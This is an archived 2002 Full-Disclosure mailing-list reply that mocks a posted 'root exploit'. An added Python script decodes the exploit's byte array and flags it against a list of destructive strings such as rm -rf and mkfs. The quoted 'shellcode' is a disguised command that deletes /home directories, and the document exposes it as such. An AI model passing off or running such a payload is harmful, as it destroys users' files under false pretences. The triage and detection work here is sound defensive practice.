[Full-Disclosure] Proof of concept code to kill script kiddies out of the water!

From: Nexus (nexus@patrol.i-way.co.uk)
Date: 11/29/02


From: nexus@patrol.i-way.co.uk (Nexus)
Date: Fri, 29 Nov 2002 09:56:08 -0000


> Get r00t on any Linux x86 system
> With the below shellcode.
>
> It uses an exploit in the linux
> kernel to elevate privileges to root!
>
> */
> char shellcode[] =
> "\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
> "\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
> "\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
> "\x72\x3b\x65\x63\x68\x6f\x20\x62"
> "\x6c\x34\x63\x6b\x68\x34\x74\x2c"
> "\x68\x65\x68\x65";

What version of Linux ? I ran this on my windows 95 box and it said:
"'rm' is not recognized as an internal or external command, operable program
or batch file."
I ported the shellcode to a windows batch file and it still failed...
What am I doing wrong ?
/me confused ;-)

Also, my Linux box is Z80, not x86 - I can do a Z80 version if you want ?

Cheers.
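
Added example, not part of either post: before compiling or running a posted proof of concept, decode its byte array and check whether it is machine code at all. The script below does that for the array quoted above; the SUSPICIOUS list and the 0.95 threshold are assumptions chosen for illustration.

```python
import re
import string

# The array from the quoted post, copied with the "> " quote prefix removed.
POSTED = r'''
char shellcode[] =
"\x2f\x62\x69\x6e\x2f\x72\x6d\x20"
"\x2d\x72\x66\x20\x2f\x68\x6f\x6d"
"\x65\x2f\x2a\x3b\x63\x6c\x65\x61"
"\x72\x3b\x65\x63\x68\x6f\x20\x62"
"\x6c\x34\x63\x6b\x68\x34\x74\x2c"
"\x68\x65\x68\x65";
'''

PRINTABLE = set(string.printable.encode())
# Assumed watch list of strings worth flagging in a decoded payload.
SUSPICIOUS = (b"rm -rf", b"/bin/", b"mkfs", b"dd if=")


def decode_c_literals(source: str) -> bytes:
    """Join adjacent C string literals, expanding \\xHH escapes only."""
    out = bytearray()
    for literal in re.findall(r'"((?:[^"\\]|\\.)*)"', source):
        pos = 0
        for m in re.finditer(r"\\x([0-9a-fA-F]{2})", literal):
            out += literal[pos:m.start()].encode("latin-1")
            out.append(int(m.group(1), 16))
            pos = m.end()
        out += literal[pos:].encode("latin-1")
    return bytes(out)


def triage(payload: bytes) -> dict:
    """Report whether a payload is mostly printable text and what it says."""
    printable = sum(b in PRINTABLE for b in payload)
    ratio = printable / len(payload) if payload else 0.0
    is_text = ratio > 0.95  # assumed threshold: real opcodes rarely pass it
    return {
        "length": len(payload),
        "looks_like_text": is_text,
        "suspicious_strings": [s.decode() for s in SUSPICIOUS if s in payload],
        "text": payload.decode("ascii", "replace") if is_text else None,
    }


if __name__ == "__main__":
    for key, value in triage(decode_c_literals(POSTED)).items():
        print(f"{key}: {value!r}")
```

A payload that decodes entirely to printable ASCII is a command string, not x86 instructions, which is why the reply's Windows shell complained about 'rm'.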


